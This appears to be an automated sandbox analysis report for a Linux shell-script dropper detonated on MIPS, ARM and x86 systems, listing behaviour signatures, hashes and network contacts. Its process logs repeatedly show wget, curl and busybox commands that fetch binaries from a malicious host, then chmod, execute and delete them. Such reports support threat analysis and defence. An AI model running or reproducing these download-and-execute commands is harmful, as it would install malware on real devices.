Analysis Overview
SHA256
41cb3df665c4ff82baa293815d73e288c4209329f28c72e01b2332e9204d4c96
Threat Level: Shows suspicious behavior
The file 69e3df199d5f354bf5297b390b090569.bin was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-24 01:26
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-24 01:26
Reported
2024-11-24 01:28
Platform
debian9-mipsbe-20240611-en
Max time kernel
94s
Max time network
97s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy | /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 | /usr/bin/curl | N/A |
Processes
/tmp/d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh
[/tmp/d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/bin/chmod
[chmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy
[./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/bin/rm
[rm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
Files
/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-24 01:26
Reported
2024-11-24 01:28
Platform
debian9-mipsel-20240226-en
Max time kernel
125s
Max time network
156s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy | /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy | N/A |
| N/A | /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 | /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 | N/A |
| N/A | /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat | /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat | N/A |
| N/A | /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c | /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c | N/A |
| N/A | /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E | /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E | N/A |
| N/A | /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y | /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y | N/A |
| N/A | /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT | /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT | N/A |
| N/A | /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 | /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 | N/A |
| N/A | /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB | /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB | N/A |
| N/A | /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR | /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR | N/A |
| N/A | /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 | /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 | N/A |
| N/A | /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey | /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey | N/A |
| N/A | /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O | /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O | N/A |
| N/A | /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 | /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E | /usr/bin/curl | N/A |
| File opened for modification | /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat | /usr/bin/curl | N/A |
| File opened for modification | /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 | /usr/bin/curl | N/A |
Processes
/tmp/d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh
[/tmp/d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/bin/chmod
[chmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy
[./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/bin/rm
[rm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]
/bin/chmod
[chmod 777 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]
/tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4
[./F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]
/bin/rm
[rm F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]
/bin/chmod
[chmod 777 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]
/tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat
[./BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]
/bin/rm
[rm BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]
/bin/chmod
[chmod 777 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]
/tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c
[./vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]
/bin/rm
[rm vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/bin/chmod
[chmod 777 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E
[./93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/bin/rm
[rm 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/bin/chmod
[chmod 777 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y
[./iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/bin/rm
[rm iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/bin/chmod
[chmod 777 Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT
[./Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/bin/rm
[rm Lo46YywIia327erXTugKxcchWtLwMJPGmT]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/bin/chmod
[chmod 777 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0
[./TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/bin/rm
[rm TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]
/bin/chmod
[chmod 777 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]
/tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB
[./KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]
/bin/rm
[rm KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]
/bin/chmod
[chmod 777 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]
/tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR
[./05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]
/bin/rm
[rm 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]
/bin/chmod
[chmod 777 jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]
/tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5
[./jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]
/bin/rm
[rm jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]
/bin/chmod
[chmod 777 nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]
/tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey
[./nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]
/bin/rm
[rm nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]
/bin/chmod
[chmod 777 qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]
/tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O
[./qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]
/bin/rm
[rm qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]
/bin/chmod
[chmod 777 pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]
/tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5
[./pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]
/bin/rm
[rm pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
Files
/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-24 01:26
Reported
2024-11-24 01:28
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
148s
Max time network
129s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh
[/tmp/d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 151.101.193.91:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| GB | 89.187.167.9:443 | | tcp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 89.187.167.38:443 | 1527653184.rsc.cdn77.org | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-24 01:26
Reported
2024-11-24 01:29
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
38s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh
[/tmp/d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |